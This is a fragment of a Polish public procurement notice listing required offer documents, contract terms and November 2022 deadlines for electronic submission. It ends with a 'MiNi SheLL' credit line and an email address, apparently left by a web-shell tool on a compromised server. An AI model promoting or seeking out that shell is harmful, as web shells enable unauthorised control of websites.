Wykonawcy.<br/>3.2 Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego - wzór oświadczenia stanowi Załącznik nr 3 do SWZ. <br/>5. Oświadczenie składane na podstawie art. 125. ust. 5 ustawy Pzp –załącznik nr 3a<br/>6. Następujące dokumenty- patrz V pkt 5.5. -5.5.2 SWZ<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia stanowi załącznik nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt. 16.1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia i zmiany umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-18 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-18 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com